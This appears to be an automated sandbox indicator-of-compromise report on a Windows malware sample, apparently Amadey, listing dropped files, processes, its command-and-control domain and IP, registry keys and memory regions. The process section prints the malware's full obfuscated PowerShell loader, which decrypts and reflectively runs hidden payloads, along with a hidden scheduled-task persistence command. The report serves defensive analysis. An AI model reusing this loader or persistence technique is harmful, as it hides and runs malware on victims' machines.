IOC Report
jcgLYlM4dg.exe

loading gif

Files

File Path
Type
Category
Malicious
jcgLYlM4dg.exe
PE32 executable (GUI) Intel 80386, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat
DOS batch file, ASCII text, with very long lines (63646), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\startup_str_958.bat
DOS batch file, ASCII text, with very long lines (63646), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\startup_str_958.vbs
ASCII text, with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1mlkuq2o.nkx.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bqxn2sgn.q2x.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_brfnssnu.pxr.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iv00qaod.pdx.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k1ynmbvf.pgj.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kagq4ejl.d42.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mioqotm5.qac.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tqcyqojc.rxg.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ufh5j5hg.ks3.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wnsahwpj.zai.psm1
ASCII text, with no line terminators
dropped
There are 6 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\jcgLYlM4dg.exe
"C:\Users\user\Desktop\jcgLYlM4dg.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat" "
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_958_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\startup_str_958.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\startup_str_958.vbs"
malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\startup_str_958.vbs"
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_958.bat" "
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_958.bat" "
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 4 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
http://ruspyc.top/j4Fvskd3/index.php
85.114.96.4
malicious
ruspyc.top/j4Fvskd3/index.php
malicious
http://ruspyc.top/j4Fvskd3/index.phpR
unknown
http://nuget.org/NuGet.exe
unknown
https://aka.ms/winsvr-2022-pshelp
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://aka.ms/pscore6lBeq
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://ruspyc.top/j4Fvskd3/index.phpC
unknown
http://ruspyc.top/j4Fvskd3/index.phppv8
unknown
http://crl.microKY
unknown
http://ruspyc.top/j4Fvskd3/index.php=
unknown
https://aka..winsvr
unknown
https://github.com/Pester/Pester
unknown
http://ruspyc.top/j4Fvskd3/index.php?
unknown
http://crl.microT
unknown
http://ruspyc.top/j4Fvskd3/index.phpeaL
unknown
http://ruspyc.top/j4Fvskd3/index.phpon
unknown
http://ruspyc.top/j4Fvskd3/index.phpncalrpc:
unknown
http://ruspyc.top/j4Fvskd3/index.php7
unknown
http://ruspyc.top/j4Fvskd3/index.phpk
unknown
http://ruspyc.top/j4Fvskd3/index.phpTl
unknown
http://ruspyc.top/j4Fvskd3/index.php_9y
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://ruspyc.top/j4Fvskd3/index.phpRo
unknown
http://ruspyc.top/j4Fvskd3/index.phpp
unknown
http://ruspyc.top/j4Fvskd3/index.phpq
unknown
http://ruspyc.top/j4Fvskd3/index.phpg
unknown
http://ruspyc.top/j4Fvskd3/index.php(
unknown
http://ruspyc.top/j4Fvskd3/index.php10(1).cr
unknown
http://ruspyc.top/j4Fvskd3/index.phpZ
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://ruspyc.top/j4Fvskd3/index.phpitW
unknown
http://ruspyc.top/j4Fvskd3/index.phpm32
unknown
http://ruspyc.top/j4Fvskd3/index.phpb/
unknown
There are 30 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
ruspyc.top
85.114.96.4
malicious

IPs

IP
Domain
Country
Malicious
85.114.96.4
ruspyc.top
Palestinian Territory Occupied
malicious

Registry

Path
Value
Malicious
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.ApplicationCompany

Memdumps

Base Address
Regiontype
Protect
Malicious
A080000
direct allocation
page read and write
malicious
A0F1000
unclassified section
page execute read
malicious
AAE1000
unclassified section
page execute read
malicious
8E19000
trusted library allocation
page read and write
A90F000
stack
page read and write
8EAB000
trusted library allocation
page read and write
4771000
trusted library allocation
page read and write
8277000
heap
page read and write
747D000
stack
page read and write
31362FB000
stack
page read and write
2F13000
heap
page read and write
8E55000
trusted library allocation
page read and write
7587000
heap
page read and write
4D40000
heap
page read and write
4A26000
trusted library allocation
page read and write
8188000
heap
page read and write
86B1000
trusted library allocation
page read and write
8D63000
trusted library allocation
page read and write
6B1E000
stack
page read and write
A157000
unclassified section
page readonly
7B01000
heap
page read and write
81E2000
heap
page read and write
7370000
trusted library allocation
page read and write
5DC7000
trusted library allocation
page read and write
840F000
stack
page read and write
8C69000
trusted library allocation
page read and write
7B42000
heap
page read and write
8DB5000
trusted library allocation
page read and write
3270000
heap
page read and write
8E21000
trusted library allocation
page read and write
8D71000
trusted library allocation
page read and write
8D4D000
trusted library allocation
page read and write
5315000
heap
page execute and read and write
8CB7000
trusted library allocation
page read and write
2EF3000
heap
page read and write
67AC000
stack
page read and write
6F1A000
stack
page read and write
76AE000
heap
page read and write
6E10000
trusted library allocation
page read and write
2EEC000
heap
page read and write
319C000
heap
page read and write
8DF7000
trusted library allocation
page read and write
8DC9000
trusted library allocation
page read and write
8D07000
trusted library allocation
page read and write
2A20000
trusted library allocation
page read and write
6E6E000
stack
page read and write
8E43000
trusted library allocation
page read and write
7560000
trusted library allocation
page read and write
2EC0000
heap
page read and write
7C30000
trusted library allocation
page read and write
8620000
trusted library allocation
page read and write
328E000
stack
page read and write
7AFE000
stack
page read and write
4CE0000
trusted library allocation
page read and write
72D2000
trusted library allocation
page read and write
8D9F000
trusted library allocation
page read and write
4D2E000
stack
page read and write
9651000
trusted library allocation
page read and write
71B0000
trusted library allocation
page read and write
72D0000
heap
page read and write
2E8E000
stack
page read and write
8E51000
trusted library allocation
page read and write
2F2C000
heap
page read and write
7F51000
trusted library allocation
page read and write
7AB1000
heap
page read and write
8D05000
trusted library allocation
page read and write
70DE000
stack
page read and write
8290000
heap
page read and write
58B7000
trusted library allocation
page read and write
7988000
heap
page read and write
A20000
unkown
page readonly
8CD9000
trusted library allocation
page read and write
8CAD000
trusted library allocation
page read and write
4CDA000
trusted library allocation
page execute and read and write
31359FE000
stack
page read and write
7C50000
trusted library allocation
page execute and read and write
8D75000
trusted library allocation
page read and write
2A04000
trusted library allocation
page read and write
6D4E000
stack
page read and write
7F550000
trusted library allocation
page execute and read and write
8C61000
trusted library allocation
page read and write
7BE1000
heap
page read and write
853E000
stack
page read and write
7120000
trusted library allocation
page read and write
3089000
heap
page read and write
74EE000
stack
page read and write
2CE0000
trusted library allocation
page read and write
8CC5000
trusted library allocation
page read and write
59DB000
trusted library allocation
page read and write
3183000
heap
page read and write
9FB1000
trusted library allocation
page read and write
8CEB000
trusted library allocation
page read and write
8CF5000
trusted library allocation
page read and write
782E000
stack
page read and write
8716000
trusted library allocation
page read and write
A0F0000
unclassified section
page readonly
8D47000
trusted library allocation
page read and write
8E07000
trusted library allocation
page read and write
2EF3000
heap
page read and write
4DE0000
heap
page read and write
8C5D000
trusted library allocation
page read and write
7500000
trusted library allocation
page read and write
89CE000
trusted library allocation
page read and write
2ECE000
stack
page read and write
8320000
trusted library allocation
page execute and read and write
4CBD000
trusted library allocation
page execute and read and write
70DE000
stack
page read and write
5C8F000
trusted library allocation
page read and write
727E000
stack
page read and write
8E0F000
trusted library allocation
page read and write
2ED0000
heap
page read and write
7BE0000
trusted library allocation
page read and write
2EC4000
heap
page read and write
8D45000
trusted library allocation
page read and write
8730000
heap
page read and write
2800000
heap
page read and write
6C7D000
heap
page read and write
8CF3000
trusted library allocation
page read and write
7C00000
trusted library allocation
page read and write
2EEC000
heap
page read and write
4935000
trusted library allocation
page execute and read and write
A85000
unkown
page readonly
8E3F000
trusted library allocation
page read and write
8C75000
trusted library allocation
page read and write
A155000
unclassified section
page read and write
767F000
stack
page read and write
35FB000
heap
page read and write
5BCC000
stack
page read and write
2DDA000
stack
page read and write
8E13000
trusted library allocation
page read and write
7C42000
heap
page read and write
2EF3000
heap
page read and write
8100000
trusted library allocation
page read and write
8D5F000
trusted library allocation
page read and write
588E000
stack
page read and write
6E0F000
trusted library allocation
page read and write
8E1F000
trusted library allocation
page read and write
2F26000
heap
page read and write
3090000
heap
page read and write
7B90000
trusted library allocation
page read and write
1CE38540000
heap
page read and write
8040000
trusted library allocation
page read and write
2ED0000
heap
page read and write
6A1D000
stack
page read and write
8D81000
trusted library allocation
page read and write
724B000
heap
page read and write
6C85000
heap
page execute and read and write
2ED0000
heap
page read and write
8D43000
trusted library allocation
page read and write
2CD0000
trusted library allocation
page read and write
8305000
heap
page read and write
8CDB000
trusted library allocation
page read and write
8070000
heap
page read and write
818E000
heap
page read and write
8D13000
trusted library allocation
page read and write
7F6B000
trusted library allocation
page read and write
6006000
trusted library allocation
page read and write
723B000
stack
page read and write
8D1D000
trusted library allocation
page read and write
6CCB000
stack
page read and write
8D03000
trusted library allocation
page read and write
2DF7000
heap
page read and write
2F44000
heap
page read and write
2690000
heap
page read and write
4930000
trusted library allocation
page read and write
8DEB000
trusted library allocation
page read and write
320C000
heap
page read and write
7B50000
trusted library allocation
page execute and read and write
26D8000
stack
page read and write
2DB7000
stack
page read and write
8EA1000
trusted library allocation
page read and write
74AE000
stack
page read and write
34F0000
heap
page read and write
51DE000
stack
page read and write
7BB1000
heap
page read and write
8DC7000
trusted library allocation
page read and write
79B5000
heap
page read and write
9D4E000
trusted library allocation
page execute and read and write
719E000
stack
page read and write
4230000
heap
page read and write
27FF000
stack
page read and write
32DC000
heap
page read and write
8CAB000
trusted library allocation
page read and write
9C5E000
trusted library allocation
page read and write
4830000
trusted library allocation
page read and write
8EB1000
trusted library allocation
page read and write
4DB0000
trusted library allocation
page read and write
8C77000
trusted library allocation
page read and write
2F2F000
heap
page read and write
8F81000
trusted library allocation
page read and write
8330000
trusted library allocation
page read and write
1CE38535000
heap
page read and write
2F78000
heap
page read and write
72C0000
heap
page read and write
2A80000
heap
page read and write
7B60000
trusted library allocation
page read and write
6EDF000
stack
page read and write
8D7D000
trusted library allocation
page read and write
8D35000
trusted library allocation
page read and write
331B000
heap
page read and write
8DAF000
trusted library allocation
page read and write
81C8000
trusted library allocation
page read and write
29B0000
heap
page read and write
701D000
stack
page read and write
624F000
trusted library allocation
page read and write
A8CE000
stack
page read and write
7AFC000
heap
page read and write
8D33000
trusted library allocation
page read and write
1CE38611000
heap
page read and write
8D55000
trusted library allocation
page read and write
5300000
heap
page read and write
8E09000
trusted library allocation
page read and write
826B000
heap
page read and write
3053000
trusted library allocation
page execute and read and write
6FDF000
heap
page read and write
49CC000
trusted library allocation
page read and write
8E6F000
trusted library allocation
page read and write
AB37000
unclassified section
page readonly
825E000
heap
page read and write
A152000
unclassified section
page read and write
715E000
stack
page read and write
8E29000
trusted library allocation
page read and write
8CE3000
trusted library allocation
page read and write
1CE38500000
heap
page read and write
2F1D000
heap
page read and write
3050000
heap
page read and write
8CD1000
trusted library allocation
page read and write
7BB0000
heap
page read and write
7F40000
heap
page read and write
AB30000
unclassified section
page readonly
866E000
stack
page read and write
8DD3000
trusted library allocation
page read and write
8D1F000
trusted library allocation
page read and write
8DC3000
trusted library allocation
page read and write
8047000
trusted library allocation
page read and write
A4B000
stack
page read and write
34F9000
heap
page read and write
8D91000
trusted library allocation
page read and write
8D49000
trusted library allocation
page read and write
72C0000
heap
page execute and read and write
2CDD000
trusted library allocation
page execute and read and write
2927000
heap
page read and write
8D61000
trusted library allocation
page read and write
2EEB000
heap
page read and write
34C0000
heap
page read and write
337E000
stack
page read and write
2A70000
trusted library allocation
page execute and read and write
8E8F000
trusted library allocation
page read and write
6FDE000
stack
page read and write
6BC6000
trusted library allocation
page read and write
8DF9000
trusted library allocation
page read and write
8D53000
trusted library allocation
page read and write
3135DFF000
stack
page read and write
8E67000
trusted library allocation
page read and write
7D0E000
stack
page read and write
711E000
stack
page read and write
A1DE000
stack
page read and write
8C6B000
trusted library allocation
page read and write
8E17000
trusted library allocation
page read and write
A54000
unkown
page readonly
5310000
heap
page execute and read and write
8DA1000
trusted library allocation
page read and write
8D15000
trusted library allocation
page read and write
8D41000
trusted library allocation
page read and write
2BF0000
heap
page read and write
8D23000
trusted library allocation
page read and write
2EF3000
heap
page read and write
570E000
stack
page read and write
A075000
trusted library allocation
page read and write
3020000
heap
page read and write
8CE5000
trusted library allocation
page read and write
2C90000
heap
page read and write
AB44000
unclassified section
page write copy
8EA7000
trusted library allocation
page read and write
81A0000
heap
page read and write
96B0000
trusted library allocation
page read and write
8DFB000
trusted library allocation
page read and write
2BD0000
heap
page read and write
726B000
stack
page read and write
4CC9000
trusted library allocation
page read and write
8E7F000
trusted library allocation
page read and write
6B5A000
stack
page read and write
70BB000
stack
page read and write
71D0000
trusted library allocation
page read and write
3040000
trusted library allocation
page read and write
2C3C000
stack
page read and write
8700000
heap
page read and write
34BD000
stack
page read and write
7B11000
heap
page read and write
7275000
heap
page read and write
8D5B000
trusted library allocation
page read and write
8360000
heap
page read and write
2F20000
heap
page read and write
4C7E000
stack
page read and write
8E6B000
trusted library allocation
page read and write
8E4F000
trusted library allocation
page read and write
524E000
stack
page read and write
6E1E000
stack
page read and write
ACEE000
stack
page read and write
6E5E000
stack
page read and write
8E95000
trusted library allocation
page read and write
2D05000
trusted library allocation
page execute and read and write
7840000
trusted library allocation
page read and write
31D6000
heap
page read and write
99E5000
trusted library allocation
page read and write
73FF000
stack
page read and write
84A3000
trusted library allocation
page read and write
4D61000
trusted library allocation
page read and write
2F28000
heap
page read and write
8C7D000
trusted library allocation
page read and write
74F0000
trusted library allocation
page read and write
8D19000
trusted library allocation
page read and write
7C42000
heap
page read and write
86BD000
stack
page read and write
8120000
trusted library allocation
page read and write
A94B000
stack
page read and write
881D000
trusted library allocation
page read and write
3080000
heap
page read and write
8C93000
trusted library allocation
page read and write
8DFD000
trusted library allocation
page read and write
65F5000
trusted library allocation
page read and write
27B0000
heap
page read and write
8DF3000
trusted library allocation
page read and write
2DDC000
stack
page read and write
74A0000
trusted library allocation
page read and write
8DB7000
trusted library allocation
page read and write
8380000
heap
page read and write
66F5000
trusted library allocation
page read and write
8EA9000
trusted library allocation
page read and write
2B40000
heap
page read and write
A21000
unkown
page execute read
2F2A000
heap
page read and write
31CE000
stack
page read and write
2F23000
heap
page read and write
2F31000
heap
page read and write
84A9000
trusted library allocation
page read and write
8CFD000
trusted library allocation
page read and write
8CE1000
trusted library allocation
page read and write
4CC0000
heap
page read and write
8C71000
trusted library allocation
page read and write
8283000
heap
page read and write
4847000
heap
page read and write
473E000
stack
page read and write
31E0000
heap
page read and write
2F35000
heap
page read and write
48A0000
heap
page read and write
9B95000
trusted library allocation
page read and write
84A5000
trusted library allocation
page read and write
8DD1000
trusted library allocation
page read and write
76D0000
trusted library allocation
page read and write
8E9F000
trusted library allocation
page read and write
3130000
heap
page readonly
2A00000
trusted library allocation
page read and write
6733000
trusted library allocation
page read and write
7AFC000
heap
page read and write
2DA0000
stack
page read and write
7550000
heap
page read and write
8C99000
trusted library allocation
page read and write
30B2000
heap
page read and write
8CCD000
trusted library allocation
page read and write
1CE385B9000
heap
page read and write
8E2B000
trusted library allocation
page read and write
8C85000
trusted library allocation
page read and write
52E0000
heap
page read and write
320B000
heap
page read and write
2DFE000
stack
page read and write
6D1E000
stack
page read and write
7BC0000
trusted library allocation
page read and write
8D31000
trusted library allocation
page read and write
2E03000
heap
page read and write
8307000
heap
page read and write
8E1B000
trusted library allocation
page read and write
7923000
heap
page read and write
8DCB000
trusted library allocation
page read and write
7540000
trusted library allocation
page read and write
7010000
heap
page execute and read and write
8E9D000
trusted library allocation
page read and write
4CE5000
trusted library allocation
page execute and read and write
8DA9000
trusted library allocation
page read and write
8E85000
trusted library allocation
page read and write
7150000
trusted library allocation
page execute and read and write
71F8000
heap
page read and write
7870000
trusted library allocation
page read and write
8CA3000
trusted library allocation
page read and write
96D3000
trusted library allocation
page read and write
3135FFD000
stack
page read and write
6F00000
heap
page read and write
3169000
heap
page read and write
7210000
trusted library allocation
page read and write
6C80000
trusted library allocation
page read and write
2CE0000
heap
page read and write
5A8F000
stack
page read and write
30A0000
heap
page read and write
8CCF000
trusted library allocation
page read and write
3310000
heap
page read and write
A686000
trusted library allocation
page read and write
8D0F000
trusted library allocation
page read and write
2F13000
heap
page read and write
AA3E000
trusted library allocation
page read and write
7C60000
trusted library allocation
page read and write
752F000
stack
page read and write
8DCD000
trusted library allocation
page read and write
8CC7000
trusted library allocation
page read and write
2F3A000
heap
page read and write
6D5B000
stack
page read and write
2F1F000
heap
page read and write
8C8B000
trusted library allocation
page read and write
8E75000
trusted library allocation
page read and write
8DD9000
trusted library allocation
page read and write
52CD000
stack
page read and write
2E80000
heap
page read and write
4820000
heap
page execute and read and write
8E23000
trusted library allocation
page read and write
3166000
heap
page read and write
2F19000
heap
page read and write
5331000
trusted library allocation
page read and write
8DB3000
trusted library allocation
page read and write
2F39000
heap
page read and write
334D000
heap
page read and write
8CE7000
trusted library allocation
page read and write
8E1D000
trusted library allocation
page read and write
6D0E000
stack
page read and write
2F23000
heap
page read and write
8DCF000
trusted library allocation
page read and write
4360000
heap
page read and write
8D25000
trusted library allocation
page read and write
8640000
trusted library allocation
page execute and read and write
8D2B000
trusted library allocation
page read and write
72B5000
trusted library allocation
page read and write
7480000
trusted library allocation
page read and write
7C11000
heap
page read and write
8610000
trusted library allocation
page execute and read and write
2F4F000
heap
page read and write
7D20000
trusted library allocation
page read and write
9911000
trusted library allocation
page read and write
8D79000
trusted library allocation
page read and write
864E000
stack
page read and write
8DA3000
trusted library allocation
page read and write
AC0E000
stack
page read and write
8C8F000
trusted library allocation
page read and write
7889000
trusted library allocation
page read and write
319D000
heap
page read and write
27E0000
heap
page read and write
580F000
stack
page read and write
A84000
unkown
page read and write
6FEB000
heap
page read and write
709E000
stack
page read and write
33A7000
heap
page read and write
7990000
heap
page read and write
8EAF000
trusted library allocation
page read and write
5A64000
trusted library allocation
page read and write
2CD4000
trusted library allocation
page read and write
8DF5000
trusted library allocation
page read and write
A674000
trusted library allocation
page read and write
8C7F000
trusted library allocation
page read and write
7935000
heap
page read and write
30B0000
heap
page read and write
7C20000
trusted library allocation
page execute and read and write
4E6E000
stack
page read and write
594F000
stack
page read and write
7510000
trusted library allocation
page read and write
8CB1000
trusted library allocation
page read and write
6487000
trusted library allocation
page read and write
2F78000
heap
page read and write
7860000
trusted library allocation
page read and write
8CB9000
trusted library allocation
page read and write
6F20000
heap
page execute and read and write
7320000
trusted library allocation
page read and write
2F21000
heap
page read and write
8C6F000
trusted library allocation
page read and write
A21000
unkown
page execute read
9FA3000
trusted library allocation
page read and write
2F13000
heap
page read and write
7AB0000
heap
page read and write
34E0000
trusted library section
page read and write
7700000
heap
page execute and read and write
6E1B000
stack
page read and write
2E28000
heap
page read and write
8DA7000
trusted library allocation
page read and write
2F78000
heap
page read and write
2F50000
heap
page read and write
8E93000
trusted library allocation
page read and write
8D9B000
trusted library allocation
page read and write
7FDD000
stack
page read and write
2F16000
heap
page read and write
2DCB000
stack
page read and write
320E000
stack
page read and write
81B0000
heap
page read and write
9B99000
trusted library allocation
page read and write
2F0F000
heap
page read and write
2D4F000
heap
page read and write
ABCC000
stack
page read and write
2A03000
trusted library allocation
page execute and read and write
33BE000
stack
page read and write
4E2C000
stack
page read and write
520E000
stack
page read and write
8CDD000
trusted library allocation
page read and write
55E6000
trusted library allocation
page read and write
2F30000
heap
page readonly
7BF0000
trusted library allocation
page read and write
8D3D000
trusted library allocation
page read and write
8E7D000
trusted library allocation
page read and write
2E10000
heap
page read and write
6F78000
heap
page read and write
3060000
trusted library allocation
page read and write
8410000
heap
page read and write
6E5E000
stack
page read and write
8971000
trusted library allocation
page read and write
46EE000
stack
page read and write
8CC9000
trusted library allocation
page read and write
32D0000
heap
page read and write
711D000
stack
page read and write
8DDB000
trusted library allocation
page read and write
728E000
heap
page read and write
8E97000
trusted library allocation
page read and write
320C000
heap
page read and write
8C83000
trusted library allocation
page read and write
59F0000
heap
page read and write
8245000
heap
page read and write
8E9B000
trusted library allocation
page read and write
1CE38530000
heap
page read and write
316F000
heap
page read and write
2F0C000
heap
page read and write
6FAE000
stack
page read and write
71E0000
trusted library allocation
page read and write
7C10000
trusted library allocation
